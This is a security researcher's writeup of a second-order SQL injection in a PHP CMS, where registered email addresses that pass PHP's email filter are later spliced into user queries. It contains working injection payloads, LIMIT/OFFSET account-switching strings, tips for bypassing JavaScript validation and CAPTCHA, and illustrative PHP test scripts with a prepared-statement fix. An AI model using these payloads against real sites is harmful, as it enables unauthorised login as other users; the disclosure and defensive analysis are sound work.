Author: myndtt (a first contribution from a reader of Xin'an Road)
1、 Vulnerability premise
1. Download page (latest version as of July 6, 2018)
https://pan.baidu.com/s/1D9HWq#list/path=%2F
2. Users can register on the front end with an email address.
3. The registered email address can take forms such as:
1'/**/or/**/1=1#@qq.com
2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c
4. The only complication is that registering such odd-looking addresses takes a little extra effort.
2、 Vulnerability analysis
The user login logic is in function\api\ourphpuser\ourphp_system.php.
During login, the statement $_SESSION['username'] = $useremail; stores the email address the user registered with, which doubles as the username, in $_SESSION['username'].
Many operations in client\user\index.php take $_SESSION['username'] directly into database queries.
Even where $_SESSION['username'] is not otherwise processed, it still holds the email address the user registered with, and it is used to look up that user's record in the user table.
The user registration logic is in client\user\ourphp_play.class.php.
The email address has to pass $emailvar = filter_var($userloginemail, FILTER_VALIDATE_EMAIL);, as documented in the PHP manual.
The manual is not very explicit about what that filter lets through, but the character list documented for FILTER_SANITIZE_EMAIL serves as a reference. Testing shows that FILTER_VALIDATE_EMAIL accepts a large set of characters useful to an attacker (parentheses and commas do not seem to get through), namely !#$%&'*+-/=?^_{|}~@.[], which is what makes the injection possible. (The check is of course not purely character-based: an address of the form xx@q.c passes, while xx@q. does not.)
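The following script is an added example, not code from the CMS or from the author: it runs PHP's own FILTER_VALIDATE_EMAIL over the addresses discussed above and records the verdict each one should get. The first four inputs are the ones reported in this writeup; the remaining ones extend the test to the full character list, to the rejected characters, and to RFC 5322 quoted local parts, which let a comma through as well (an observation about the filter added here, not part of the original test).

```php
<?php
// Added example, not code from the CMS: probes which addresses PHP's
// FILTER_VALIDATE_EMAIL accepts. The first four inputs come from this
// writeup; the rest extend the test to the character list above, to the
// rejected characters, and to quoted local parts (an extra observation
// about the filter, not part of the original test).
declare(strict_types=1);

/** Exactly the check the registration code relies on. */
function passesEmailFilter(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

/** Expected verdict per input (true = accepted by the filter). */
function emailFilterCases(): array
{
    return [
        // payloads from the writeup
        '1\'/**/or/**/1=1#@qq.com'                           => true,
        '2\'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c' => true,
        'xx@q.c'                                             => true,  // a one-letter TLD is enough
        'xx@q.'                                              => false, // a TLD label is required
        // the full character list from the writeup, used as a local part
        '!#$%&\'*+-/=?^_{|}~@q.c'                            => true,
        // characters the writeup found rejected, used unquoted
        'a(b)@q.c'                                           => false,
        'a,b@q.c'                                            => false,
        // caveat: an RFC 5322 quoted local part lets a comma through as well
        '"a,b"@q.c'                                          => true,
    ];
}

/** Returns the inputs whose real verdict differs from the expected one. */
function mismatchedCases(): array
{
    $mismatches = [];
    foreach (emailFilterCases() as $email => $expected) {
        if (passesEmailFilter($email) !== $expected) {
            $mismatches[] = $email;
        }
    }
    return $mismatches;
}

foreach (emailFilterCases() as $email => $expected) {
    printf("%-52s %s\n", $email, passesEmailFilter($email) ? 'accepted' : 'rejected');
}
$bad = mismatchedCases();
echo $bad === [] ? "all verdicts as expected\n" : 'unexpected: ' . implode(', ', $bad) . "\n";
```

Run it with any PHP 7 or 8 CLI; the point to take away is that a single quote, the MySQL comment character #, and the comment delimiters /* */ are all legal in an unquoted local part, so FILTER_VALIDATE_EMAIL on its own says nothing about whether a value is safe to concatenate into SQL.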
3、 Vulnerability demonstration process
1、 Set up a local copy of the site and register a few normal users to demonstrate against.
2、 Then register the malicious user 1'/**/or/**/1=1#@qq.com. Because the front end validates the form with JavaScript, you need to disable JavaScript in the browser (or submit the request directly) when registering.
(Since this CMS's CAPTCHA is also implemented in JavaScript, it can be bypassed the same way for brute forcing.)
3、 Log in with the address just registered.
4、 To log in as an arbitrary user, you shift the row the query selects with LIMIT and OFFSET; registering the following address does that:
2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c
There is a length limit on the email field, enforced in client\user\ourphp_play.class.php, which comes into play here.
Capture and submit the registration request with an intercepting proxy rather than through the browser form; otherwise URL encoding makes the string too long.
The /**/ between the closing quote and "or" in the registered address can be left out.
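As an added example (not the CMS's code, and not from the author), the script below models the flow described in the analysis and demonstration sections above: the email stored in $_SESSION['username'] is spliced into the user lookup, MySQL discards everything after the unquoted # as a comment, a keyword filter that only recognises "or" with a space on each side is slipped past by /**/, and the URL-encoded form of each payload is measurably longer than the raw one. The table and column names (users, email) are placeholders, the keyword filters are hypothetical models rather than the CMS's actual filter, and findUserSafely() shows the prepared-statement fix but needs a live PDO connection, so it is not called at top level.

```php
<?php
// Added example, not the CMS's code. Placeholder table/column names;
// the two keyword filters are hypothetical models, not the CMS's filter.
declare(strict_types=1);

const USER_TABLE = 'users';   // assumption: not taken from the CMS
const EMAIL_COL  = 'email';   // assumption: not taken from the CMS

/** The vulnerable pattern: the session username is spliced into SQL text. */
function buildUserQuery(string $sessionUsername): string
{
    return sprintf("SELECT * FROM %s WHERE %s = '%s' LIMIT 1",
        USER_TABLE, EMAIL_COL, $sessionUsername);
}

/**
 * What MySQL effectively runs: an unquoted '#' starts a comment, so the
 * original closing quote and LIMIT are thrown away. Simplified view that
 * does not track quoting; it only illustrates the payloads above.
 */
function effectiveQuery(string $sql): string
{
    return trim(preg_replace('/#.*$/s', '', $sql));
}

/** Hypothetical filter that only matches ' or ' / ' and ' with literal spaces. */
function spaceDelimitedKeywordFilterBlocks(string $input): bool
{
    return preg_match('/\s(?:and|or)\s/i', $input) === 1;
}

/** Hypothetical improvement: inline comments count as separators too. */
function commentAwareKeywordFilterBlocks(string $input): bool
{
    $sep = '(?:\s|\/\*.*?\*\/)+';
    return preg_match('/' . $sep . '(?:and|or)' . $sep . '/i', $input) === 1;
}

/** Length on the wire once the browser URL-encodes the address. */
function encodedLength(string $email): int
{
    return strlen(rawurlencode($email));
}

/** The actual fix: bind the value instead of splicing it. Needs a live connection. */
function findUserSafely(PDO $pdo, string $email): ?array
{
    $sql  = sprintf('SELECT * FROM %s WHERE %s = :email LIMIT 1', USER_TABLE, EMAIL_COL);
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$payloads = [
    "1'/**/or/**/1=1#@qq.com",                           // selects the first row
    "2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c", // selects the third row
    "1'or/**/1=1#@qq.com",                               // the /**/ after the quote dropped
];

foreach ($payloads as $p) {
    echo "registered : $p\n";
    echo "raw query  : " . buildUserQuery($p) . "\n";
    echo "executed   : " . effectiveQuery(buildUserQuery($p)) . "\n";
    printf("space filter blocks: %s | comment-aware filter blocks: %s | length raw %d, url-encoded %d\n\n",
        spaceDelimitedKeywordFilterBlocks($p) ? 'yes' : 'no',
        commentAwareKeywordFilterBlocks($p) ? 'yes' : 'no',
        strlen($p), encodedLength($p));
}
```

The third payload is the point of the remark above about dropping the /**/ after the quote: MySQL accepts '1'or directly, so even a filter that treats comments as whitespace still misses it, and the only robust fix is the prepared statement in findUserSafely(), with the registration-time email check kept as a format check rather than a security boundary.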
4、 A few closing remarks
1. Given my limited ability, this is the only way I can exploit the vulnerability; I wonder whether anyone has other ideas.
2. I have noticed that many CMSes use filter_var($userloginemail, FILTER_VALIDATE_EMAIL); to validate email addresses, which carries the same latent risk; it is worth paying attention to during an audit.
3. Back to this CMS: its anti-injection filter is basically fine, but requiring a space on each side of and and or when filtering is a mistake, since an inline comment such as /**/ separates the keyword just as well without containing a space.
4. In the end, the latest version has been fixed, and no further exploitation seems possible.
5. This is a very simple vulnerability. Even so, I wish you all the best!